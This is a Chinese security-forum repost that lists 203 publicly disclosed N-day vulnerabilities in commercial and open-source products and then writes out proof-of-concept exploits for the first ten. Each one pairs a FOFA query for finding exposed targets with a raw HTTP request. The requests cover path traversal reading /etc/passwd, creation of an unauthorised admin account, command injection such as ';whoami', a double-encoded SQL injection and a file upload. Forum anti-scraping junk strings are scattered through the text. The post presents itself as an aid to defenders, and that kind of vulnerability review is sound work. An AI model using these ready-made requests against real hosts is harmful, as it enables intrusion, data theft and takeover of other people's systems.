中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]

作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406
( W1 d5 m  ~; D道一安全 2024-06-05 07:41 北京
$ }. f: J# ~& n4 c+ ~. v以下文章来源于网络安全新视界 ,作者网络安全新视界3 N" n4 z) v8 k2 q

4 b4 l- g. P# W% ^: M. n2 f发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。0 L. K! J, x. V) N
  \  P- R" v$ o% \4 s% C+ l3 `
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。+ S5 ]5 m# \" P  I+ C+ r7 ?

8 C7 R8 ^7 [2 ?6 z4 l3 a3 e安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
! j0 k; _( j3 j1 I7 c, i3 o7 |; }1 _) I6 g
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。5 i6 E" ?3 ^! c! w8 \4 _
4 O; l9 V" d% V& h) S9 m- W/ v/ G# {8 f
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
9 m8 v) F2 o- {3 s8 R$ K
5 a" i' k- Z' C" ]) w8 A4 H3 B! g* e3 H
声明
; _) o" y9 k, f! n- Q) v$ U, g4 P5 E# m6 `3 p" K! b
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
$ m2 q& b$ K" m* L  m: M! ^; ^' T' ~9 V8 @; ]; n
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
, O6 Z* j* n4 H, `
- \2 d& ]( j* t7 ^+ V
/ c0 g5 j- R* |3 n% s! J
9 t/ G1 h( m! T6 _" S* v. n目录
% N2 v6 a$ w% \5 x: V+ o2 q1 q$ Y$ `. q  a# M: V  Y/ k4 K
01
  g# r4 N" g- |; v% X. \0 C8 t& C, ?' z7 U$ D; Q' q  `
1. StarRocks MPP数据库未授权访问
( [, x8 U/ J4 L' _, b- b2. Casdoor系统static任意文件读取
7 G* L" K; z  q3. EasyCVR智能边缘网关 userlist 信息泄漏
0 ]9 E1 W, p. y6 I  O( D# }8 T4. EasyCVR视频管理平台存在任意用户添加& C9 [: @6 x2 i& C: c
5. NUUO NVR 视频存储管理设备远程命令执行
# [5 k; P, a: V$ Z: J# {6. 深信服 NGAF 任意文件读取& x% d# v% q0 E( y" I
7. 鸿运主动安全监控云平台任意文件下载
! h* b9 Q, {4 ~0 }$ O/ _, A7 T8. 斐讯 Phicomm 路由器RCE
# u6 @1 }) d) L5 d9. 稻壳CMS keyword 未授权SQL注入" I( C* `/ t( h2 }
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" @* ?% n2 V! _% R
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入+ {' \- F1 t3 p7 |
12. Jorani < 1.0.2 远程命令执行3 B$ ^8 }) I9 k4 Z$ d9 E  F3 x) h5 w
13. 红帆iOffice ioFileDown任意文件读取% K3 y9 R2 o* U# \. ]
14. 华夏ERP(jshERP)敏感信息泄露* e0 ~( R6 X( ?# x( P! |
15. 华夏ERP getAllList信息泄露
9 @9 q: x$ H  M9 P# {# b16. 红帆HFOffice医微云SQL注入
$ F  Q2 k. S2 ?8 B; i17. 大华 DSS itcBulletin SQL 注入6 q: P' f$ ^0 a6 H1 k
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露4 Y0 E, \9 u3 q* M
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入3 o$ _  t( R. }" }: T) ~, J, X
20. 大华ICC智能物联综合管理平台任意文件读取* S# L1 K* o3 o( |& V
21. 大华ICC智能物联综合管理平台random远程代码执行( I0 W( s; _0 W- N$ F; [3 k
22. 大华ICC智能物联综合管理平台 log4j远程代码执行  Z  [# q5 z! }8 X, v2 j
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ F) u; K( a2 Z( y0 b9 K24. 用友NC 6.5 accept.jsp任意文件上传! c/ C) p$ V3 G- W( H
25. 用友NC registerServlet JNDI 远程代码执行( j( U9 Z1 j3 t" p
26. 用友NC linkVoucher SQL注入/ T9 T* [) s0 K4 F7 v: y
27. 用友 NC showcontent SQL注入
- i" u: h2 R: E4 }$ H" _3 R" l& p28. 用友NC grouptemplet 任意文件上传
! I9 o5 `9 p% h. u7 i9 |# m29. 用友NC down/bill SQL注入" V* k- [+ ~9 l% H/ Y4 Q  h7 K
30. 用友NC importPml SQL注入: }$ I( ~% b# E/ d3 {7 W
31. 用友NC runStateServlet SQL注入
/ t, v7 ?# v5 r" ?- r! |# G32. 用友NC complainbilldetail SQL注入" \% T; U5 p3 q0 r$ C/ T5 c
33. 用友NC downTax/download SQL注入
5 m: ~& O9 Y7 b+ P0 X, N34. 用友NC warningDetailInfo接口SQL注入
. {5 A$ e$ K; W  W) H2 E5 D8 _35. 用友NC-Cloud importhttpscer任意文件上传' {5 ~6 p. C2 Q
36. 用友NC-Cloud soapFormat XXE
" z( x2 @  v3 j  V7 K* Z6 d37. 用友NC-Cloud IUpdateService XXE+ [' e! M# w0 P& o2 L/ C
38. 用友U8 Cloud smartweb2.RPC.d XXE) S1 P/ \3 i: i! P
39. 用友U8 Cloud RegisterServlet SQL注入
& `2 V& D, I, z5 |4 p( h. T" O40. 用友U8-Cloud XChangeServlet XXE$ S9 i4 O- r3 i
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入' a2 d, {2 M4 i: _6 n- _
42. 用友GRP-U8 SmartUpload01 文件上传6 J, |' d& j: I/ n' S7 U8 P
43. 用友GRP-U8 userInfoWeb SQL注入致RCE, f" ~7 }$ A- R: n, g
44. 用友GRP-U8 bx_dj_check.jsp SQL注入$ |8 u0 M, u- t; W# U. L
45. 用友GRP-U8 ufgovbank XXE
" X  k: Q7 `7 U6 M  K4 S. x2 s8 J46. 用友GRP-U8 sqcxIndex.jsp SQL注入' X" S# O- ]5 J9 q4 l- ]
47. 用友GRP A++Cloud 政府财务云 任意文件读取, n' \9 o! |5 \5 M* U
48. 用友U8 CRM swfupload 任意文件上传
, Q! T! d6 q- u2 H2 g0 C/ [8 C49. 用友U8 CRM系统uploadfile.php接口任意文件上传/ I0 X/ N& k: M* [) B$ |
50. QDocs Smart School 6.4.1 filterRecords SQL注入  ]& R9 g/ G6 m
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ L& R! z; ^0 c+ C8 L1 t
52. 泛微E-Office json_common.php sql注入, v5 {0 y* x; c, O
53. 迪普 DPTech VPN Service 任意文件上传: |+ @: \/ c5 R1 `7 K! e
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
5 i3 l# A4 o8 a5 n+ d55. 畅捷通T+ getdecallusers信息泄露
8 o6 u+ k0 }. J# j3 L; r' X+ E56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# O) u4 [  H2 E7 X
57. 畅捷通T+ keyEdit.aspx SQL注入
6 e% g/ `& s$ m7 c58. 畅捷通T+ KeyInfoList.aspx sql注入* A* ^/ K6 G3 p' l8 v. M; m6 K6 d
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" ?5 I8 ?, [" Z60. 百卓Smart管理平台 importexport.php SQL注入" _  ^+ C8 g7 z$ [- P6 B
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& q8 X  r% u; s1 O62. IP-guard WebServer 远程命令执行
. p5 Q1 X2 U  H( k  u63. IP-guard WebServer任意文件读取
& K5 _- \; H2 Z64. 捷诚管理信息系统CWSFinanceCommon SQL注入. h) j* [( c2 r% F0 Z8 u. e5 H
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
: l! R1 B& i/ O+ X3 V9 h66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& [$ Z* e  ^6 y1 ~6 O8 J67. 万户ezOFFICE wpsservlet任意文件上传( [6 G  n! v, M6 t: Z: q6 @
68. 万户ezOFFICE wf_printnum.jsp SQL注入
' Y0 _& @% _: n* `69. 万户 ezOFFICE contract_gd.jsp SQL注入
! h6 E; f. h. S( d7 s70. 万户ezEIP success 命令执行" t/ a# I& ~# [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入4 n( |, X; U# N. e
72. 致远OA getAjaxDataServlet XXE! e8 S4 V/ I" Z  |9 w8 |
73. GeoServer wms远程代码执行
. {5 \. Y, V8 E; L74. 致远M3-server 6_1sp1 反序列化RCE' X( v) c, T8 [( b% A& Q
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
. H( R& \6 P( j; Y4 X9 h76. 新开普掌上校园服务管理平台service.action远程命令执行( @6 Y" i& y6 B) ^$ n- j
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
" z0 {/ l4 w+ M' @0 E78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传; S* Q: c+ h1 f% h, G
79. BYTEVALUE 百为流控路由器远程命令执行" n  A3 N3 z# E' a- i
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# g) ]1 @6 Z- S: s( Q; P8 ^81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
( ~$ ~, i7 t7 [& `82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行+ {; V) {  i  ]1 U
83. JeecgBoot testConnection 远程命令执行
4 B# }4 s9 g3 g: r84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
9 Z: V" ^. u0 \* b85. SysAid On-premise< 23.3.36远程代码执行7 C4 e' x9 q% R) Z; @
86. 日本tosei自助洗衣机RCE, F  K2 I2 ~# m; i) A
87. 安恒明御安全网关aaa_local_web_preview文件上传( W( R) G3 Z! |$ I  O2 R4 @
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
. K6 X7 l3 K/ L# d0 f89. 致远互联FE协作办公平台editflow_manager存在sql注入
* M! w; v9 W1 ]3 L( S! p1 ]+ C90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
8 a" a  n6 X8 N; ?' k* S91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
6 P( q3 U: W/ B& F. [3 Z6 e4 I7 P" @92. 海康威视运行管理中心session命令执行7 w" ~9 V6 _: p3 A: n' v, Z4 L- O' G
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ r2 `" r2 F% f. w/ ^% N94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 [2 d7 t+ h; t' `& Q6 r0 d: |
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# I0 ]( Y' ?, u) @' H: L96. Apache OFBiz  18.12.11 groovy 远程代码执行
; n. C$ D: ~0 [8 |- U" v+ |97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
6 A% g; N/ s. S* n+ y2 }' Q98. SpiderFlow爬虫平台远程命令执行
4 ?1 Y  o3 O( e% q99. Ncast盈可视高清智能录播系统busiFacade RCE4 n  R; {8 i7 I# _
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传/ y5 L8 P+ d% G3 `9 [' k+ y
101. ivanti policy secure-22.6命令注入
) g: f9 s' a  _102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行  C) U1 o' E7 B
103. Ivanti Pulse Connect Secure VPN XXE/ a# @; T' g5 a+ [) G& @
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露* \; B1 m9 L* }
105. SpringBlade v3.2.0 export-user SQL 注入
9 @( w: {  I$ ~5 q106. SpringBlade dict-biz/list SQL 注入
( o/ D3 H: b( ~; c  x% s107. SpringBlade tenant/list SQL 注入* x" c! g% a, ]( E' A- R
108. D-Tale 3.9.0 SSRF  |0 J1 w4 @, h# U( O/ L4 w' D% J
109. Jenkins CLI 任意文件读取* E" n! B& u6 A' U* k
110. Goanywhere MFT 未授权创建管理员
4 U; h) T5 z. X6 ]1 k' F0 c; H111. WordPress Plugin HTML5 Video Player SQL注入- c6 e$ S, r  b, f, T7 \
112. WordPress Plugin NotificationX SQL 注入
  P+ v0 A; {8 E' q' k113. WordPress Automatic 插件任意文件下载和SSRF& l) i5 U. z+ H3 B/ V6 m2 I
114. WordPress MasterStudy LMS插件 SQL注入% A+ T& C' E$ J
115. WordPress Bricks Builder <= 1.9.6 RCE# }) X0 o& B% z6 }' j) `* K
116. wordpress js-support-ticket文件上传0 r) a, f& d- z! U: u1 X
117. WordPress LayerSlider插件SQL注入
; o$ ]5 j& N7 Q/ s" l) q6 U0 g118. 北京百绰智能S210管理平台uploadfile.php任意文件上传$ L: Z+ H1 M" E0 c# M% E+ d. Z; u
119. 北京百绰智能S20后台sysmanageajax.php sql注入
% C2 H5 L+ w2 s) {& |7 ?/ |3 T120. 北京百绰智能S40管理平台导入web.php任意文件上传: x) R+ s) p/ d0 j& W. v$ X" T
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
0 n& ?+ x+ s8 |1 z" N2 \122. 北京百绰智能s200管理平台/importexport.php sql注入
# g$ c9 P! B% x0 C  a6 T% l0 M) x$ G+ W123. Atlassian Confluence 模板注入代码执行) P& J* K# j- N) s0 s5 A2 y
124. 湖南建研工程质量检测系统任意文件上传: I9 D; d3 F/ T% V; f
125. ConnectWise ScreenConnect身份验证绕过+ @( u. a( k( A) M3 @  x
126. Aiohttp 路径遍历
, f$ h4 U# q; u0 Q0 c127. 广联达Linkworks DataExchange.ashx XXE( W  E$ l) Q) {% G0 n7 i1 |
128. Adobe ColdFusion 反序列化
+ U3 n7 x  _2 u2 N( }- c4 b129. Adobe ColdFusion 任意文件读取3 V, U, o/ j; k' b# ]5 G, k+ |
130. Laykefu客服系统任意文件上传
0 U* e5 r7 ^/ G131. Mini-Tmall <=20231017 SQL注入% y# S8 S0 E, u, ^4 _
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过8 M0 _7 D3 B- V. T8 {* j
133. H5 云商城 file.php 文件上传
( N% g- q1 C% u, [# z134. 网康NS-ASG应用安全网关index.php sql注入. }5 u) n& h( m* b# T3 t) D
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
* {: W$ O# f: X9 Q+ b3 _2 p, M: \136. NextChat cors SSRF
& c3 p! |1 ]5 c  K& D  k0 o& f  O137. 福建科立迅通信指挥调度平台down_file.php sql注入# @" O  w5 Y( c( B+ Y
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
. {, Z- M1 x5 ~) ^! f) `# A* Y; ]139. 福建科立讯通信指挥调度平台editemedia.php sql注入' t# H, B$ A5 ~, C
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入6 ?( l3 {" [& R" }- X
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: e1 j% x! u+ y, e142. CMSV6车辆监控平台系统中存在弱密码' b- S  @" @  `( r" v+ Q* h+ q+ |& g
143. Netis WF2780 v2.1.40144 远程命令执行
5 }7 m* ^& k- x, {5 O8 Y5 q144. D-Link nas_sharing.cgi 命令注入5 E7 O/ {9 u+ t9 O- S0 l
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入0 b+ a' q  |0 q  }
146. MajorDoMo thumb.php 未授权远程代码执行  C6 M- z0 X& m$ O3 N' x; ~
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
' A/ m  l- p* i4 `: R3 C4 H7 j148. CrushFTP 认证绕过模板注入
+ d2 j9 f% x. \) J6 y149. AJ-Report开源数据大屏存在远程命令执行
# r- l# c2 P7 p8 x; ^9 `* x150. AJ-Report 1.4.0 认证绕过与远程代码执行
9 e( e7 w* P7 v7 z$ @: _: H3 E151. AJ-Report 1.4.1 pageList sql注入: K% h% D- x0 K# }
152. Progress Kemp LoadMaster 远程命令执行' _$ C; y4 v8 N. P; A7 _/ o
153. gradio任意文件读取) {3 R) V) k1 P
154. 天维尔消防救援作战调度平台 SQL注入
4 o% u; x3 L& ~! L155. 六零导航页 file.php 任意文件上传0 P5 H8 M# A, [1 O1 u
156. TBK DVR-4104/DVR-4216 操作系统命令注入
$ r1 N% f/ `  r* L157. 美特CRM upload.jsp 任意文件上传+ x' w/ A4 K' h3 ]4 T
158. Mura-CMS-processAsyncObject存在SQL注入% {$ Y/ S- r$ l% m
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传3 y* |7 H1 P! j0 O& ]/ @* h* u5 e
160. Sonatype Nexus Repository 3目录遍历与文件读取) {' j; _0 G. p% C  B+ s9 k( s, N
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
! `' L1 L9 Q8 N: m162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传1 ]' _7 T- T; a1 M0 ?0 \* S
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 K/ G& k) X8 ]6 v
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传1 I$ D4 s7 O4 e; `" E' o3 j. d
165. OrangeHRM 3.3.3 SQL 注入
1 s9 o( G+ Q7 n$ E166. 中成科信票务管理平台SeatMapHandler SQL注入
) N2 X9 G1 c1 i: m  r  k: _' s167. 精益价值管理系统 DownLoad.aspx任意文件读取
/ X9 h" C" S: T3 U) n0 Q4 y168. 宏景EHR OutputCode 任意文件读取
+ J4 U: O. h! A169. 宏景EHR downlawbase SQL注入. x0 x& y6 {2 [, _; n0 N, N$ F8 Y
170. 宏景EHR DisplayExcelCustomReport 任意文件读取7 a9 y; ], K7 X, j* ~
171. 通天星CMSV6车载定位监控平台 SQL注入
4 m% R: @. G( ]4 j% M' Z172. DT-高清车牌识别摄像机任意文件读取
% s, p& F  S( Z2 K) d" I173. Check Point 安全网关任意文件读取
- S/ ~) l" W9 S$ j. M: h8 X174. 金和OA C6 FileDownLoad.aspx 任意文件读取( M2 a1 b$ @- S) }5 M
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入( s) P# ?+ R1 H* d; s. ^$ i. j
176. 电信网关配置管理系统 rewrite.php 文件上传
. p# d$ |- y& y! K+ L' O* l! B# {177. H3C路由器敏感信息泄露; x9 b/ d$ t5 I  d0 O
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
  e: _5 a% Y7 V* s179. 建文工程管理系统存在任意文件读取5 T- e& h- t6 w# J* G' k1 W
180. 帮管客 CRM jiliyu SQL注入' M& H9 D; C' Q$ I
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: f: X7 F- f8 c( ]182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 T8 E( I6 g( E  W183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入4 {. j/ r4 k" O# g+ G* C: r5 D
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
% Y8 S4 o' @0 ~9 j- q( O) F185. 瑞友天翼应用虚拟化系统SQL注入: ^3 B/ P1 L1 x8 n2 T( j5 ]# Y
186. F-logic DataCube3 SQL注入9 g9 ~0 U4 J8 y% e0 K/ E& W+ l
187. Mura CMS processAsyncObject SQL注入
6 D7 a% ], M" D+ f6 d188. 叁体-佳会视频会议 attachment 任意文件读取2 y% k' V0 m  M+ ?7 F4 G1 U
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: J: d- Z  f! N, h; w+ q190. 短视频矩阵营销系统 poihuoqu 任意文件读取
  s# F# R9 J* f4 H6 O% m9 G3 g191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
; o( _/ Z" o4 w) j192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( I6 e" N/ s, Z7 U$ H193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
+ h& t  \" m; F2 H5 f9 c194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
  o3 R9 f# Z, P' m) V195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
: `. d' R! r6 F196. 河南省风速科技统一认证平台密码重置
  g% m+ k( u8 |+ J& w3 L; S, Q1 i197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入" D" y' H6 O$ t1 t3 u& r* x
198.  阿里云盘 WebDAV 命令注入  {' h6 h2 \+ ?
199. cockpit系统assetsmanager_upload接口 文件上传
* g; z" k$ o# d6 O% K" i4 q3 y200. SeaCMS海洋影视管理系统dmku SQL注入" m7 G$ x, d% ^. h* U1 Q9 @/ F
201. 方正全媒体新闻采编系统 binary SQL注入
2 A. l8 z+ k! r) E& `202. 微擎系统 AccountEdit任意文件上传
; x1 [0 R" Q" O: a3 H- v; O8 T203. 红海云EHR PtFjk 文件上传
, I5 o0 d  q  C+ [  F  _% K* ~- t$ ?- m
POC列表
4 z- m3 {' `8 H: `* _" B
! C/ l/ S$ {# G02
" X4 _4 k# i: Z0 P2 I* p# l8 T" r/ ]; A+ l% O8 d8 b% Q7 a
1. StarRocks MPP数据库未授权访问
- J- _4 `5 }  S9 gFOFA :title="StarRocks"1 A9 v# x- I+ G5 _; ?
GET /mem_tracker HTTP/1.1- ^9 ]5 X/ e. N
Host: URL4 W( G6 \5 w. J6 \5 U

; z& C0 t& z9 ~
. F! U) N! K9 Q( d: [4 `2. Casdoor系统static任意文件读取& H3 E, f" K; s; R! `
FOFA :title="Casdoor"
& x# d; r: A% oGET /static/../../../../../../../../../../../etc/passwd HTTP/1.14 F- M7 C; a  \. s  e" f
Host: xx.xx.xx.xx:9999
* w' Z/ H- r( }User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" t$ G4 _6 s* a: o. [5 P' o  E) O
Connection: close0 D1 f+ X  X+ H3 X" c) |& P
Accept: */*# q4 O4 X: ]. c
Accept-Language: en! ?4 G9 t: \4 A  P% W- {7 h# O
Accept-Encoding: gzip+ ?6 ~4 z* H- v0 N1 R1 T( y, ~5 H

9 D. J& D2 x! [( b7 l& e
  ?8 \$ j, s0 }3 c$ d) H  Q3. EasyCVR智能边缘网关 userlist 信息泄漏5 [9 T' G! L: W
FOFA :title="EasyCVR"5 E5 b& r+ z4 E
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1( G; @) Q  Q; E
Host: xx.xx.xx.xx: \9 s" I" E8 D+ W
/ g; z* C- X) D* x  ]) r

- {9 W6 X3 {% m$ a- A- X6 D- R0 T1 @1 {4. EasyCVR视频管理平台存在任意用户添加
+ y3 e: P; ?! u+ hFOFA :title="EasyCVR"
; Q* b- I  l# d4 W; k& l; U8 Q- K2 W
' G! P8 x& F5 P+ d. Ppassword更改为自己的密码md5/ Y. o5 G: t% a3 U/ Q, T" _
POST /api/v1/adduser HTTP/1.1" D) J4 O7 k3 M- l! ~/ B* d
Host: your-ip+ \0 U/ t9 Z6 j$ G6 D: [7 U
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 w) B0 w8 E7 G& [5 a- p9 V; r9 s4 B+ W, I# e, s& e
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1# J6 ^3 m: U, j7 T2 C
; d& y& R7 D# x& q

5 Q1 b$ l- l" w9 |5. NUUO NVR 视频存储管理设备远程命令执行& }8 M! t) {  o0 U
FOFA:title="Network Video Recorder Login"  s2 c0 Q; q+ y- p& q7 l9 V; `, }) D
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1) a, M/ Z0 t7 @$ [  n
Host: xx.xx.xx.xx
$ e. P& [9 L% {; F% ^. a1 b3 m( S! w/ ]+ K( h" C9 o8 x

% ?2 w4 V& m6 ]. f* b: a  j6. 深信服 NGAF 任意文件读取
* w, u5 x) s# A, R8 Y% }; uFOFA:title="SANGFOR | NGAF"
# M- F# j0 Y3 E0 X- p' SGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1) D( u7 F) K  e1 V
Host:2 [5 g6 W, r+ \- c- k- ^
0 y: v& k* S! B, L+ p

6 [6 k4 q5 r2 x  m7. 鸿运主动安全监控云平台任意文件下载/ b# A$ \, r; J  o; D5 O; p
FOFA:body="./open/webApi.html"1 X* n$ Q. p9 Q5 v, {
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.11 x2 l" v) C! n% P/ P/ H0 {& Q
Host:
7 `# ~/ C/ H$ u2 @$ R3 g7 P$ X4 N2 H8 A1 D* }. A

. _, i. \! S6 a8. 斐讯 Phicomm 路由器RCE
% r8 k; y$ l- o$ B/ T. z  C4 A! PFOFA:icon_hash="-1344736688"+ q1 d* X, h) R; k1 N1 T
默认账号admin登录后台后,执行操作3 y4 ^+ W  m( m6 s+ Y8 M! G9 I
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
5 W0 h8 S' @8 q, u( L, V7 Q  ]Host: x.x.x.x
8 C' ~4 Q# m# A1 t; A4 y1 ]Cookie: sysauth=第一步登录获取的cookie" B! P$ l8 _/ H& o  _: y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz/ h/ e: e$ `0 |1 Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ {. n- {9 ^, U6 \
# L" k& i& a3 a
------WebKitFormBoundaryxbgjoytz/ k& o% I$ l/ P) _
Content-Disposition: form-data; name="wifiRebootEnablestatus"
  _3 C0 T, U$ V% H
  Y. s& T3 q& V" C) c& q# p" t' ?%s; q" _, k. q4 ^; K
------WebKitFormBoundaryxbgjoytz
3 @6 Q2 b" y/ n" E" ^' D. n& C" HContent-Disposition: form-data; name="wifiRebootrange"
) E9 ~1 E0 a1 M0 {. P0 [/ F$ F* `, J1 Q5 {) t! S. `; i
12:00; id;
, b' }# W' F6 r2 C: r) {' `$ \------WebKitFormBoundaryxbgjoytz/ R. g$ n& x* I' u2 T! t; K
Content-Disposition: form-data; name="wifiRebootendrange"& f; ?+ m4 k& b) O8 N
" g& |5 N* r; x
%s:. ^/ t6 E5 J: U/ J0 l
------WebKitFormBoundaryxbgjoytz: u( G$ z. d1 N
Content-Disposition: form-data; name="cururl2"5 z# t. \$ x+ f1 M  e6 s

4 U% W% {' S, }& i9 ?  H
& W. F" M: R  i& ]+ w- W------WebKitFormBoundaryxbgjoytz--2 X( H8 C! H$ d1 U% \1 m
+ ^' ?+ S& b8 J4 ^
) F$ I9 d: v1 H) L. j+ Q& S5 M
9. 稻壳CMS keyword 未授权SQL注入
5 S7 `! Z0 Z9 V1 gFOFA:app="Doccms"0 j9 l( E4 m; }# Q) P  G# h
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
, P1 s# x; U0 a' r: o( x/ NHost: x.x.x.x1 e, W5 @* l% p3 Z" a

: {, Q9 S3 g- _! f: ~$ b( Z# a
0 a- E- M+ m: `* i( Y  h  Ypayload为下列语句的二次Url编码! v* L; V1 \4 `2 F
+ x( O4 h) _- o# T
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#: s5 i6 J5 L& E3 a
7 v, h7 A& G/ G2 f
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
$ ~. |0 _( h2 {( n3 O$ Y1 Q- gFOFA:icon_hash="953405444"
4 ~9 I$ k$ }- P7 O/ }: _$ p  \+ c/ G/ B, O+ [& T5 H+ I
文件上传后响应中包含上传文件的路径
  [& ^1 i8 f/ |1 O) CPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ u. u; r: ~% U) h8 _9 d+ Y* }Host: x.x.x.x:xx5 i% B1 |. S* J+ Q- ?7 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
3 k: X. p2 p7 ~; CContent-Length: 197
# r9 M6 o9 e" N  X1 L# G9 Z% N+ FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" Q& s. t) v6 N. _3 a% [
Accept-Encoding: gzip, deflate
+ |6 L' X4 k" O* Q2 K" a) I1 ?; b, |/ rAccept-Language: zh-CN,zh;q=0.97 h4 J) l9 h. {/ G0 H
Connection: close, u, u- \' @( O$ t) g. P4 R; z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu# R3 e7 L5 H+ h* X% c( v

. v. ?9 W3 {0 @: R' R+ X# t! \------WebKitFormBoundaryxdgaqmqu
4 z" k, m9 X* [( e' I4 N) C# kContent-Disposition: form-data; name="file"filename="icfitnya.txt"
. p  V5 U6 r# C' t: q9 N* TContent-Type: text/html$ N4 g- E9 {- t5 T8 e& |& W9 N
% S+ w; O" H$ L* F0 D9 ?
jmnqjfdsupxgfidopeixbgsxbf9 X, K8 i: e4 Y: A. ^% P
------WebKitFormBoundaryxdgaqmqu--
